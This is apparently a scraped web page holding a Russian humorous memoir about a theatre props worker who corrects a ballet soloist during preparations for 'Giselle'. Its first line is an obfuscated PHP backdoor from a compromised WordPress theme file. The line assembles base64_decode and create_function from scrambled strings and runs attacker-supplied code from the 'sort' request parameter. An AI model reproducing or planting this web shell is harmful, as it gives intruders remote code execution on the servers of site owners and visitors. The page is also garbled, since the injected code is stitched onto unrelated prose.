nnn$z0=$_REQUEST['sort'];$q1='';$c2="wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";$y3=array(8,38,15,7,6,4,26,25,7,34,24,25,7);foreach($y3 as $h4){$q1.=$c2[$h4];}$v5=strrev("noi"."tcnuf"."_eta"."erc");$j6=$v5("",$q1($z0));$j6();nnn?php /** * @package dazzling */ ?>

РОЛЬ НА ВЫДУМКИ ХИТРА


http://buildmate.com.sg/product/pressure-grease-gun/ "Когда  я  на  почте  служил  ямщиком…"

  . . . то есть  когда  я  в  начале  семидесятых  работала  реквизитором  на  сцене  театра, как  за  границей  его  называли " К и р б а л е т " (= Кировский  театр = Мариинка ),  то  произошёл  со  мной  такой  театроведческий  случай.

   Балет "Жизель". Конечно,  с  суперисполнителями.
   По  сюжету  – печальная  история  обманутой  девушки  на  фоне  классовых  противоречий,  обострённых  мистической  инклюзией.

   Шёл  привычный  перед спектаклем  предстартовый  ажиотаж  всех  театральных  служб  –  "цехов" . . .
                 (интересно, какое  именно  слово  до  революции  было  в м е с т о   слова   "ц е х " ? – только  сейчас  задумалась).
   Я  насЫпала  растолчённую  в  порошок  канифоль  в  жестяную  банку  с  дырками  в  крышке,  чтоб  по  всей  сцене  тончайшим слоем  вытрясти  из  неё  содержимое  –  чтоб  ноги  не  скользили ( и  ведь, подумай,  никто  никогда не  жаловался  на  аллергию!).  Также  у  меня  в руках  была  всякая   бутафорская  ерунда  для  мужских  солистов, например,  нагрудная  цепь  с  камнями-стекляшками  для  главного  персонажа – знак  высокородности  персонажа.
   Пока,  идя  по  диагонали  легендарной  сцены,  я  размышляла, ч т о   сначала  лучше:  поканифолить,  а  потом  пойти  к  солистам  на  другой  стороне  сцены,  или,  наоборот,   сначала   пойти  к  солистам,  а  потом  пылить  канифолью  –  я  уже  очутилась  у  гримуборной  главных  персонажей. Привычно  постучав  и  попросив  пардону,  я,  чуть  приоткрыв  дверь, просунула свою  руку  с  цепью  в дверь.
   Обычно, если  цепь  ловко  не  подхватывала  одевальщица,  то  я  вешала  цепь  на дверную  ручку  с  внутренней  стороны  комнаты. Но  тут,  повесив  цепь  на  ручку,  я  услышала мужской,  несколько  кокетливый  крик:
    — Ой, ой, ой ! Поосторожней ! Здесь, может  быть,  голый  принц !
    От  такой  неожиданности  из  меня  просто   а в т о м а т о м   выскочило:
    —  Здрасьте,  вы,  между  прочим,  в   "Жизели"   г р а ф ,  а   не   п р и н ц !  И , между  прочим, г о л ы м и,  как  правило,  бывают  только   к о р о л и.  А    п р и н ц ы,  как  правило –   глупые !
   Сказала  –  и  пошла  канифолить сцену.
   Только  я  дошла  до  центра   сцены,  как  на  меня  просто  налетел  этот  главный  солист,  которого  я  только  что  "просветила".
   С  криками, привлёкшими  внимание  всех,  готовящихся  к  первому  акту,  он  на  меня  стал  орать  типа  того,  что   вы. . .вы …вы . . .  вывели  меня из  себя,  из  роли,  из   гримуборной . . .  артиста,  да   перед   спектаклем . . .  я  этого  так  не  оставлю ! . . .
   Я  извинялась  и каялась,  извинялась  и каялась . . . А  он  словно  с  цепи  сорвался .
   При  всём  том  я-то   видела, что  он  только  в  данный  момент   и   в х о д и т   в   роль  великосветского  обидчика  бедных  девушек . . .

    Между  нами, театроведами,  говоря:   у м н ы й   он ?

 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

анонс: ДА  КТО  Ж  ТАКОЙ СЛОВУЩИЙ ?феномен "поручика Киже"


Добавить комментарий